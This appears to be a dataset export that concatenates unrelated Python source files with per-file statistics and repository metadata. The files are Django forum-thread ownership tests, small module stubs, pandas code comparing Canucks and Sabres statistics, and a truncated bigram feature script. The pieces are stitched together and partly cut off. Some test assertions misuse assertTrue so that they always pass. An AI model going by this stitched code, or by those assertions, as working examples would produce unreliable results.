self.assertTrue(UserModel.objects.get(pk=new_owner.pk).sync_unread_private_threads)
self.assertFalse(UserModel.objects.get(pk=self.user.pk).sync_unread_private_threads)
self.assertTrue(UserModel.objects.get(pk=self.other_user.pk).sync_unread_private_threads)
# ownership was transfered
self.assertEqual(self.thread.participants.count(), 3)
self.assertTrue(ThreadParticipant.objects.get(user=new_owner).is_owner)
self.assertFalse(ThreadParticipant.objects.get(user=self.user).is_owner)
self.assertFalse(ThreadParticipant.objects.get(user=self.other_user).is_owner)
# change was recorded in event
event = self.thread.post_set.order_by('id').last()
self.assertTrue(event.is_event)
self.assertTrue(event.event_type, 'changed_owner')
def test_moderator_takeover(self):
"""moderator can takeover the thread"""
ThreadParticipant.objects.set_owner(self.thread, self.other_user)
ThreadParticipant.objects.add_participants(self.thread, [self.user])
override_acl(self.user, {'can_moderate_private_threads': 1})
response = self.patch(
self.api_link, [
{
'op': 'replace',
'path': 'owner',
'value': self.user.pk,
},
]
)
self.assertEqual(response.status_code, 200)
# valid users were flagged for sync
self.assertFalse(UserModel.objects.get(pk=self.user.pk).sync_unread_private_threads)
self.assertTrue(UserModel.objects.get(pk=self.other_user.pk).sync_unread_private_threads)
# ownership was transfered
self.assertEqual(self.thread.participants.count(), 2)
self.assertTrue(ThreadParticipant.objects.get(user=self.user).is_owner)
self.assertFalse(ThreadParticipant.objects.get(user=self.other_user).is_owner)
# change was recorded in event
event = self.thread.post_set.order_by('id').last()
self.assertTrue(event.is_event)
self.assertTrue(event.event_type, 'tookover')
def test_moderator_closed_thread_takeover(self):
"""moderator can takeover closed thread thread"""
ThreadParticipant.objects.set_owner(self.thread, self.other_user)
ThreadParticipant.objects.add_participants(self.thread, [self.user])
self.thread.is_closed = True
self.thread.save()
override_acl(self.user, {'can_moderate_private_threads': 1})
response = self.patch(
self.api_link, [
{
'op': 'replace',
'path': 'owner',
'value': self.user.pk,
},
]
)
self.assertEqual(response.status_code, 200)
# valid users were flagged for sync
self.assertFalse(UserModel.objects.get(pk=self.user.pk).sync_unread_private_threads)
self.assertTrue(UserModel.objects.get(pk=self.other_user.pk).sync_unread_private_threads)
# ownership was transfered
self.assertEqual(self.thread.participants.count(), 2)
self.assertTrue(ThreadParticipant.objects.get(user=self.user).is_owner)
self.assertFalse(ThreadParticipant.objects.get(user=self.other_user).is_owner)
# change was recorded in event
event = self.thread.post_set.order_by('id').last()
self.assertTrue(event.is_event)
self.assertTrue(event.event_type, 'tookover')
| 34.983931 | 97 | 0.585789 | 2,995 | 28,302 | 5.382304 | 0.07212 | 0.060794 | 0.03995 | 0.032754 | 0.827047 | 0.801055 | 0.775062 | 0.747829 | 0.746774 | 0.72438 | 0 | 0.006365 | 0.306091 | 28,302 | 808 | 98 | 35.027228 | 0.814451 | 0.096848 | 0 | 0.580986 | 0 | 0 | 0.085647 | 0.008754 | 0 | 0 | 0 | 0 | 0.205986 | 1 | 0.059859 | false | 0.007042 | 0.012324 | 0.001761 | 0.080986 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
507647b1faff3de1b90d05bf726bcfde42419caf | 23 | py | Python | vega/networks/tensorflow/customs/edvr/__init__.py | jie311/vega | 1bba6100ead802697e691403b951e6652a99ccae | [
"MIT"
] | 724 | 2020-06-22T12:05:30.000Z | 2022-03-31T07:10:54.000Z | vega/networks/tensorflow/customs/edvr/__init__.py | jie311/vega | 1bba6100ead802697e691403b951e6652a99ccae | [
"MIT"
] | 147 | 2020-06-30T13:34:46.000Z | 2022-03-29T11:30:17.000Z | vega/networks/tensorflow/customs/edvr/__init__.py | jie311/vega | 1bba6100ead802697e691403b951e6652a99ccae | [
"MIT"
] | 160 | 2020-06-29T18:27:58.000Z | 2022-03-23T08:42:21.000Z | from .edvr import EDVR
| 11.5 | 22 | 0.782609 | 4 | 23 | 4.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.173913 | 23 | 1 | 23 | 23 | 0.947368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
50cf43bc9953f0df86ffbbea6cd1f426297cd5ef | 115 | py | Python | ruledxml/tests/data/003_rules.py | meisterluk/ruledxml | 2c66f0b7a931479c7ce3ab6877b1b4ea202f902a | [
"BSD-3-Clause"
] | null | null | null | ruledxml/tests/data/003_rules.py | meisterluk/ruledxml | 2c66f0b7a931479c7ce3ab6877b1b4ea202f902a | [
"BSD-3-Clause"
] | null | null | null | ruledxml/tests/data/003_rules.py | meisterluk/ruledxml | 2c66f0b7a931479c7ce3ab6877b1b4ea202f902a | [
"BSD-3-Clause"
] | null | null | null | from ruledxml import destination
@destination("/root/nested/child@attr")
def ruleNestedElement():
return 3.5
| 16.428571 | 39 | 0.756522 | 14 | 115 | 6.214286 | 0.928571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02 | 0.130435 | 115 | 6 | 40 | 19.166667 | 0.85 | 0 | 0 | 0 | 0 | 0 | 0.2 | 0.2 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.25 | 0.25 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
0fc3f424cdb67ef19efcc1abf5a2b229e45dda2b | 93 | py | Python | visdialch/utils/__init__.py | xiaoxiaoheimei/SeqDialN | 0675a4e3737a2f849e273123330ad6fddbfb2fba | [
"BSD-3-Clause"
] | 4 | 2020-10-04T15:54:49.000Z | 2021-12-11T13:10:01.000Z | visdialch/utils/__init__.py | xiaoxiaoheimei/SeqDialN | 0675a4e3737a2f849e273123330ad6fddbfb2fba | [
"BSD-3-Clause"
] | null | null | null | visdialch/utils/__init__.py | xiaoxiaoheimei/SeqDialN | 0675a4e3737a2f849e273123330ad6fddbfb2fba | [
"BSD-3-Clause"
] | 2 | 2021-06-06T11:02:51.000Z | 2021-10-06T08:41:02.000Z | from .dynamic_rnn import DynamicRNN # noqa: F401
from .dynamic_rnn_v2 import DynamicRNN_v2
| 31 | 49 | 0.817204 | 14 | 93 | 5.142857 | 0.571429 | 0.305556 | 0.388889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0625 | 0.139785 | 93 | 2 | 50 | 46.5 | 0.8375 | 0.107527 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
0fd3d527e64bcb9e4929faf275ae9b0f0cc8e72d | 70 | py | Python | WEEKS/CD_Sata-Structures/_RESOURCES/python-prac/mini-scripts/Python_Strings.txt.py | webdevhub42/Lambda | b04b84fb5b82fe7c8b12680149e25ae0d27a0960 | [
"MIT"
] | 5 | 2021-06-02T23:44:25.000Z | 2021-12-27T16:21:57.000Z | WEEKS/CD_Sata-Structures/_RESOURCES/python-prac/mini-scripts/Python_Strings.txt.py | webdevhub42/Lambda | b04b84fb5b82fe7c8b12680149e25ae0d27a0960 | [
"MIT"
] | 22 | 2021-05-31T01:33:25.000Z | 2021-10-18T18:32:39.000Z | WEEKS/CD_Sata-Structures/_RESOURCES/python-prac/mini-scripts/Python_Strings.txt.py | webdevhub42/Lambda | b04b84fb5b82fe7c8b12680149e25ae0d27a0960 | [
"MIT"
] | 3 | 2021-06-19T03:37:47.000Z | 2021-08-31T00:49:51.000Z | # You can use double or single quotes:
print("Hello")
print("Hello")
| 14 | 38 | 0.7 | 11 | 70 | 4.454545 | 0.818182 | 0.408163 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.157143 | 70 | 4 | 39 | 17.5 | 0.830508 | 0.514286 | 0 | 1 | 0 | 0 | 0.3125 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
0ffb517a3782a4042906982218e388f3a20cb400 | 68 | py | Python | src/masonite/contracts/managers/BroadcastManagerContract.py | Abeautifulsnow/masonite | f0ebb5ca05f5d88f21264e1cd0934435bd0a8791 | [
"MIT"
] | 95 | 2018-02-22T23:54:00.000Z | 2021-04-17T03:39:21.000Z | src/masonite/contracts/managers/BroadcastManagerContract.py | Abeautifulsnow/masonite | f0ebb5ca05f5d88f21264e1cd0934435bd0a8791 | [
"MIT"
] | 840 | 2018-01-27T04:26:20.000Z | 2021-01-24T12:28:58.000Z | src/masonite/contracts/managers/BroadcastManagerContract.py | Abeautifulsnow/masonite | f0ebb5ca05f5d88f21264e1cd0934435bd0a8791 | [
"MIT"
] | 100 | 2018-02-23T00:19:55.000Z | 2020-08-28T07:59:31.000Z | from abc import ABC
class BroadcastManagerContract(ABC):
pass
| 11.333333 | 36 | 0.764706 | 8 | 68 | 6.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.191176 | 68 | 5 | 37 | 13.6 | 0.945455 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
e89fc261947566b3c22973788846412696bd202f | 86 | py | Python | plugin/src/test/resources/optimizeImports/order.after.py | consulo/consulo-python | 586c3eaee3f9c2cc87fb088dc81fb12ffa4b3a9d | [
"Apache-2.0"
] | null | null | null | plugin/src/test/resources/optimizeImports/order.after.py | consulo/consulo-python | 586c3eaee3f9c2cc87fb088dc81fb12ffa4b3a9d | [
"Apache-2.0"
] | 11 | 2017-02-27T22:35:32.000Z | 2021-12-24T08:07:40.000Z | plugin/src/test/resources/optimizeImports/order.after.py | consulo/consulo-python | 586c3eaee3f9c2cc87fb088dc81fb12ffa4b3a9d | [
"Apache-2.0"
] | null | null | null | import sys
import datetime
import foo
from bar import *
sys.path
datetime.datetime
| 8.6 | 17 | 0.790698 | 13 | 86 | 5.230769 | 0.538462 | 0.264706 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.174419 | 86 | 9 | 18 | 9.555556 | 0.957746 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2cdf9742f1bc0a3e7c46bb42bc17871b2b79239e | 153 | py | Python | mass/simulation/__init__.py | SBRG/MASSpy | 1315c1d40be8feb8731c8143dbc9ba43bf8c78ff | [
"MIT"
] | 13 | 2020-07-13T00:48:13.000Z | 2022-01-27T15:42:15.000Z | mass/simulation/__init__.py | SBRG/MASSpy | 1315c1d40be8feb8731c8143dbc9ba43bf8c78ff | [
"MIT"
] | 10 | 2021-02-17T18:07:43.000Z | 2022-02-23T16:22:14.000Z | mass/simulation/__init__.py | SBRG/MASSpy | 1315c1d40be8feb8731c8143dbc9ba43bf8c78ff | [
"MIT"
] | 9 | 2020-01-15T00:48:49.000Z | 2022-03-04T07:01:17.000Z | # -*- coding: utf-8 -*-
from mass.simulation.ensemble import generate_ensemble_of_models
from mass.simulation.simulation import Simulation
__all__ = ()
| 25.5 | 64 | 0.784314 | 19 | 153 | 5.947368 | 0.631579 | 0.141593 | 0.318584 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007353 | 0.111111 | 153 | 5 | 65 | 30.6 | 0.823529 | 0.137255 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
fa3941be932cc5aedf99f5f0bf591d2377ba2865 | 9,635 | py | Python | notebooks/project_functions1.py | data301-2021-winter1/project-group23-project | ae8809e5707c35838db15e140b5932a3538e8176 | [
"MIT"
] | null | null | null | notebooks/project_functions1.py | data301-2021-winter1/project-group23-project | ae8809e5707c35838db15e140b5932a3538e8176 | [
"MIT"
] | null | null | null | notebooks/project_functions1.py | data301-2021-winter1/project-group23-project | ae8809e5707c35838db15e140b5932a3538e8176 | [
"MIT"
] | null | null | null | import pandas as pd
import seaborn as sns
import numpy as np
# Loading the csv file and dropiing the unwanted columns.
def load_and_process(path_to_csv_file):
data = (pd.read_csv(path_to_csv_file)
.drop(columns =['CF','CA','SCF','SCA','TOI', 'Unnamed: 2'])
)
return data
# Dropping all of the teams I don't want and just getting the Vancouver Canucks, reseting the index, collecting the correct games (10 before Covid-19 outbreak).
def Canucks_Before_Data(data):
data1 = (data.drop(data[data.Team.isin(["Arizona Coyotes", "Buffalo Sabres", "Boston Bruins", "Carolina Hurricanes", "Columbus Blue Jackets", "Calgary Flames", "Chicago Blackhawks", "Colorado Avalanche", "Dallas Stars", "Detroit Red Wings", "Florida Panthers", "Los Angeles Kings", "Minnesota Wild", "Nashville Predators", "Pittsburgh Penguins", "San Jose Sharks", "Tampa Bay Lightning", "St Louis Blues", "Vegas Golden Knights", "Edmonton Oilers", "Montreal Canadiens", "New Jersey Devils", "New York Islanders", "New York Rangers", "Ottawa Senators", "Philadelphia Flyers", "Toronto Maple Leafs", "Winnipeg Jets", "Washington Capitals", "Anaheim Ducks"])].index)
.reset_index()
.drop(data.index[0:27]).drop(data.index[47:56])
.reset_index().drop(columns = "index")
.drop(columns =['level_0'])
.drop(data.index[10:20])
.reset_index()
.rename(columns={'CF%':"CF% Before",'SCF%':"SCF% Before",'SH%':"SH% Before",'SV%':"SV% Before",'PDO':"PDO Before"}).drop(columns="Team")
)
return data1
# Dropping all of the teams I don't want and just getting the Vancouver Canucks, reseting the index, collecting the correct games (10 after Covid-19 outbreak).
def Canucks_After_Data(data):
data2= (data.drop(data[data.Team.isin(["Arizona Coyotes", "Buffalo Sabres", "Boston Bruins", "Carolina Hurricanes", "Columbus Blue Jackets", "Calgary Flames", "Chicago Blackhawks", "Colorado Avalanche", "Dallas Stars", "Detroit Red Wings", "Florida Panthers", "Los Angeles Kings", "Minnesota Wild", "Nashville Predators", "Pittsburgh Penguins", "San Jose Sharks", "Tampa Bay Lightning", "St Louis Blues", "Vegas Golden Knights", "Edmonton Oilers", "Montreal Canadiens", "New Jersey Devils", "New York Islanders", "New York Rangers", "Ottawa Senators", "Philadelphia Flyers", "Toronto Maple Leafs", "Winnipeg Jets", "Washington Capitals", "Anaheim Ducks"])].index)
.reset_index()
.drop(data.index[0:27]).drop(data.index[47:56])
.reset_index().drop(columns = "index")
.drop(columns =['level_0'])
.drop(data.index[0:10]).drop(data.index[20:20])
.reset_index()
.rename(columns={'CF%':"CF% After",'SCF%':"SCF% After",'SH%':"SH% After",'SV%':"SV% After",'PDO':"PDO After"}).drop(columns="Team")
)
return data2
# Dropping all of the teams I don't want and just getting the Buffalo Sabres, reseting the index, collecting the correct games (10 before Covid-19 outbreak).
def Sabres_Before_Data(data):
data3 = (data.drop(data[data.Team.isin(["Arizona Coyotes", "Vancouver Canucks", "Boston Bruins", "Carolina Hurricanes", "Columbus Blue Jackets", "Calgary Flames", "Chicago Blackhawks", "Colorado Avalanche", "Dallas Stars", "Detroit Red Wings", "Florida Panthers", "Los Angeles Kings", "Minnesota Wild", "Nashville Predators", "Pittsburgh Penguins", "San Jose Sharks", "Tampa Bay Lightning", "St Louis Blues", "Vegas Golden Knights", "Edmonton Oilers", "Montreal Canadiens", "New Jersey Devils", "New York Islanders", "New York Rangers", "Ottawa Senators", "Philadelphia Flyers", "Toronto Maple Leafs", "Winnipeg Jets", "Washington Capitals", "Anaheim Ducks"])].index)
.reset_index()
.drop(data.index[20:56])
.drop(data.index[10:20])
.drop(columns = "index")
.reset_index()
.rename(columns={'CF%':"CF% Before",'SCF%':"SCF% Before",'SH%':"SH% Before",'SV%':"SV% Before",'PDO':"PDO Before"}).drop(columns="Team")
)
return data3
# Dropping all of the teams I don't want and just getting the Buffalo Sabres, reseting the index, collecting the correct games (10 After Covid-19 outbreak).
def Sabres_After_Data(data):
data4 = (data.drop(data[data.Team.isin(["Arizona Coyotes", "Vancouver Canucks", "Boston Bruins", "Carolina Hurricanes", "Columbus Blue Jackets", "Calgary Flames", "Chicago Blackhawks", "Colorado Avalanche", "Dallas Stars", "Detroit Red Wings", "Florida Panthers", "Los Angeles Kings", "Minnesota Wild", "Nashville Predators", "Pittsburgh Penguins", "San Jose Sharks", "Tampa Bay Lightning", "St Louis Blues", "Vegas Golden Knights", "Edmonton Oilers", "Montreal Canadiens", "New Jersey Devils", "New York Islanders", "New York Rangers", "Ottawa Senators", "Philadelphia Flyers", "Toronto Maple Leafs", "Winnipeg Jets", "Washington Capitals", "Anaheim Ducks"])].index)
.reset_index()
.drop(data.index[0:10])
.drop(data.index[20:56])
.drop(columns = "index")
.reset_index()
.rename(columns={'CF%':"CF% After",'SCF%':"SCF% After",'SH%':"SH% After",'SV%':"SV% After",'PDO':"PDO After"}).drop(columns="Team")
)
return data4
# Canucks Combined Function
def Canucks_Before_And_After(data):
data1 = (data.drop(data[data.Team.isin(["Arizona Coyotes", "Buffalo Sabres", "Boston Bruins", "Carolina Hurricanes", "Columbus Blue Jackets", "Calgary Flames", "Chicago Blackhawks", "Colorado Avalanche", "Dallas Stars", "Detroit Red Wings", "Florida Panthers", "Los Angeles Kings", "Minnesota Wild", "Nashville Predators", "Pittsburgh Penguins", "San Jose Sharks", "Tampa Bay Lightning", "St Louis Blues", "Vegas Golden Knights", "Edmonton Oilers", "Montreal Canadiens", "New Jersey Devils", "New York Islanders", "New York Rangers", "Ottawa Senators", "Philadelphia Flyers", "Toronto Maple Leafs", "Winnipeg Jets", "Washington Capitals", "Anaheim Ducks"])].index)
.reset_index()
.drop(data.index[0:27]).drop(data.index[47:56])
.reset_index().drop(columns = "index")
.drop(columns =['level_0'])
.drop(data.index[10:20])
.reset_index()
.rename(columns={'CF%':"CF% Before",'SCF%':"SCF% Before",'SH%':"SH% Before",'SV%':"SV% Before",'PDO':"PDO Before"}).drop(columns="Team")
.drop(columns = ["index"])
)
data2 = (data.drop(data[data.Team.isin(["Arizona Coyotes", "Buffalo Sabres", "Boston Bruins", "Carolina Hurricanes", "Columbus Blue Jackets", "Calgary Flames", "Chicago Blackhawks", "Colorado Avalanche", "Dallas Stars", "Detroit Red Wings", "Florida Panthers", "Los Angeles Kings", "Minnesota Wild", "Nashville Predators", "Pittsburgh Penguins", "San Jose Sharks", "Tampa Bay Lightning", "St Louis Blues", "Vegas Golden Knights", "Edmonton Oilers", "Montreal Canadiens", "New Jersey Devils", "New York Islanders", "New York Rangers", "Ottawa Senators", "Philadelphia Flyers", "Toronto Maple Leafs", "Winnipeg Jets", "Washington Capitals", "Anaheim Ducks"])].index)
.reset_index()
.drop(data.index[0:27]).drop(data.index[47:56])
.reset_index().drop(columns = "index")
.drop(columns =['level_0'])
.drop(data.index[0:10]).drop(data.index[20:20])
.reset_index()
.rename(columns={'CF%':"CF% After",'SCF%':"SCF% After",'SH%':"SH% After",'SV%':"SV% After",'PDO':"PDO After"}).drop(columns="Team")
.drop(columns = ["index"])
)
DataCanucksBandA = (pd.concat([data1,data2], axis=1)
)
return DataCanucksBandA
# Sabres Combined Function
def Sabres_Before_After(data):
data3 = (data.drop(data[data.Team.isin(["Arizona Coyotes", "Vancouver Canucks", "Boston Bruins", "Carolina Hurricanes", "Columbus Blue Jackets", "Calgary Flames", "Chicago Blackhawks", "Colorado Avalanche", "Dallas Stars", "Detroit Red Wings", "Florida Panthers", "Los Angeles Kings", "Minnesota Wild", "Nashville Predators", "Pittsburgh Penguins", "San Jose Sharks", "Tampa Bay Lightning", "St Louis Blues", "Vegas Golden Knights", "Edmonton Oilers", "Montreal Canadiens", "New Jersey Devils", "New York Islanders", "New York Rangers", "Ottawa Senators", "Philadelphia Flyers", "Toronto Maple Leafs", "Winnipeg Jets", "Washington Capitals", "Anaheim Ducks"])].index)
.reset_index()
.drop(data.index[20:56])
.drop(data.index[10:20])
.drop(columns = "index")
.reset_index()
.rename(columns={'CF%':"CF% Before",'SCF%':"SCF% Before",'SH%':"SH% Before",'SV%':"SV% Before",'PDO':"PDO Before"}).drop(columns="Team")
.drop(columns = ["index"])
)
data4 = (data.drop(data[data.Team.isin(["Arizona Coyotes", "Vancouver Canucks", "Boston Bruins", "Carolina Hurricanes", "Columbus Blue Jackets", "Calgary Flames", "Chicago Blackhawks", "Colorado Avalanche", "Dallas Stars", "Detroit Red Wings", "Florida Panthers", "Los Angeles Kings", "Minnesota Wild", "Nashville Predators", "Pittsburgh Penguins", "San Jose Sharks", "Tampa Bay Lightning", "St Louis Blues", "Vegas Golden Knights", "Edmonton Oilers", "Montreal Canadiens", "New Jersey Devils", "New York Islanders", "New York Rangers", "Ottawa Senators", "Philadelphia Flyers", "Toronto Maple Leafs", "Winnipeg Jets", "Washington Capitals", "Anaheim Ducks"])].index)
.reset_index()
.drop(data.index[0:10])
.drop(data.index[20:56])
.drop(columns = "index")
.reset_index()
.rename(columns={'CF%':"CF% After",'SCF%':"SCF% After",'SH%':"SH% After",'SV%':"SV% After",'PDO':"PDO After"}).drop(columns="Team")
.drop(columns = ["index"])
)
DataSabresBandA = (pd.concat([data3,data4], axis=1)
)
return DataSabresBandA
# A function to show the statistics of selected variables for the top four functions.
def Describe(data):
return data.describe().T | 78.97541 | 671 | 0.683031 | 1,234 | 9,635 | 5.295786 | 0.127229 | 0.036725 | 0.043764 | 0.019587 | 0.912624 | 0.908646 | 0.908646 | 0.908646 | 0.908646 | 0.908646 | 0 | 0.014426 | 0.143851 | 9,635 | 122 | 672 | 78.97541 | 0.777791 | 0.085106 | 0 | 0.653061 | 0 | 0 | 0.52674 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.081633 | false | 0 | 0.030612 | 0.010204 | 0.193878 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d7089dcea4c22227791010eb712adc4d8c885694 | 31 | py | Python | Utilities/VTKPythonWrapping/paraview/vtk/widgets.py | cjh1/ParaView | b0eba067c87078d5fe56ec3cb21447f149e1f31a | [
"BSD-3-Clause"
] | 17 | 2015-02-17T00:30:26.000Z | 2022-03-17T06:13:02.000Z | Utilities/VTKPythonWrapping/paraview/vtk/widgets.py | cjh1/ParaView | b0eba067c87078d5fe56ec3cb21447f149e1f31a | [
"BSD-3-Clause"
] | null | null | null | Utilities/VTKPythonWrapping/paraview/vtk/widgets.py | cjh1/ParaView | b0eba067c87078d5fe56ec3cb21447f149e1f31a | [
"BSD-3-Clause"
] | 10 | 2015-08-31T18:20:17.000Z | 2022-02-02T15:16:21.000Z | from vtkWidgetsPython import *
| 15.5 | 30 | 0.83871 | 3 | 31 | 8.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129032 | 31 | 1 | 31 | 31 | 0.962963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d722e75cdecd33f96922437a74e0e4b270647989 | 8,385 | py | Python | scripts/svm/union.py | AdLucem/infotabs-code | 1dd90c2db1eff920c5cf19385a292dcb2cc51860 | [
"Apache-2.0"
] | 19 | 2020-05-02T01:01:29.000Z | 2022-02-20T19:26:48.000Z | scripts/svm/union.py | AdLucem/infotabs-code | 1dd90c2db1eff920c5cf19385a292dcb2cc51860 | [
"Apache-2.0"
] | null | null | null | scripts/svm/union.py | AdLucem/infotabs-code | 1dd90c2db1eff920c5cf19385a292dcb2cc51860 | [
"Apache-2.0"
] | 5 | 2020-05-01T20:31:41.000Z | 2021-11-02T08:19:52.000Z | import pandas as pd
import numpy as np
from numpy import linalg as LA
data_dir="./../../temp/data/parapremise/"
save_dir="./../../temp/svmformat/union"
def get_dimensions(train_data,dev_data,test_data, test_adverse_data, alpha3_data):
bigram_to_index = {}
index_to_bigram = []
for index,row in train_data.iterrows():
#label = int(row["label"])
try:
if row["hypothesis"][-1] == '.':
row["hypothesis"] = row["hypothesis"][:-1]
except:
print(index)
print(row["hypothesis"])
continue
unigrams = row["hypothesis"].split(" ")[:-1]
bigrams = [b for b in zip(row["hypothesis"].split(" ")[:-1], row["hypothesis"].split(" ")[1:])]
bigrams += unigrams
bigrams = set(bigrams)
try:
unigrams_premise = row["premise"].split(" ")[:-1]
bigrams_premise = [b for b in zip(row["premise"].split(" ")[:-1], row["premise"].split(" ")[1:])]
bigrams_premise += unigrams_premise
bigrams_premise = set(bigrams_premise)
except:
bigrams_premise = bigrams
bigrams_union = list(bigrams.union(bigrams_premise))
for b in bigrams_union:
key = " ".join(b)
if key not in bigram_to_index.keys():
bigram_to_index[key] = len(index_to_bigram)
index_to_bigram.append(key)
if (index+1)%1000 == 0:
print("{} examples finshed".format(index+1))
for index,row in dev_data.iterrows():
#label = int(row["label"])
if row["hypothesis"][-1] == '.':
row["hypothesis"] = row["hypothesis"][:-1]
unigrams = row["hypothesis"].split(" ")[:-1]
bigrams = [b for b in zip(row["hypothesis"].split(" ")[:-1], row["hypothesis"].split(" ")[1:])]
bigrams += unigrams
bigrams = set(bigrams)
try:
unigrams_premise = row["premise"].split(" ")[:-1]
bigrams_premise = [b for b in zip(row["premise"].split(" ")[:-1], row["premise"].split(" ")[1:])]
bigrams_premise += unigrams_premise
bigrams_premise = set(bigrams_premise)
except:
bigrams_premise = bigrams
bigrams_union = list(bigrams.union(bigrams_premise))
for b in bigrams_union:
key = " ".join(b)
if key not in bigram_to_index.keys():
bigram_to_index[key] = len(index_to_bigram)
index_to_bigram.append(key)
if (index+1)%1000 == 0:
print("{} examples finshed".format(index+1))
for index,row in test_data.iterrows():
#label = int(row["label"])
if row["hypothesis"][-1] == '.':
row["hypothesis"] = row["hypothesis"][:-1]
unigrams = row["hypothesis"].split(" ")[:-1]
bigrams = [b for b in zip(row["hypothesis"].split(" ")[:-1], row["hypothesis"].split(" ")[1:])]
bigrams += unigrams
bigrams = set(bigrams)
try:
unigrams_premise = row["premise"].split(" ")[:-1]
bigrams_premise = [b for b in zip(row["premise"].split(" ")[:-1], row["premise"].split(" ")[1:])]
bigrams_premise += unigrams_premise
bigrams_premise = set(bigrams_premise)
except:
bigrams_premise = bigrams
bigrams_union = list(bigrams.union(bigrams_premise))
for b in bigrams_union:
key = " ".join(b)
if key not in bigram_to_index.keys():
bigram_to_index[key] = len(index_to_bigram)
index_to_bigram.append(key)
if (index+1)%1000 == 0:
print("{} examples finshed".format(index+1))
for index,row in test_adverse_data.iterrows():
#label = int(row["label"])
if row["hypothesis"][-1] == '.':
row["hypothesis"] = row["hypothesis"][:-1]
unigrams = row["hypothesis"].split(" ")[:-1]
bigrams = [b for b in zip(row["hypothesis"].split(" ")[:-1], row["hypothesis"].split(" ")[1:])]
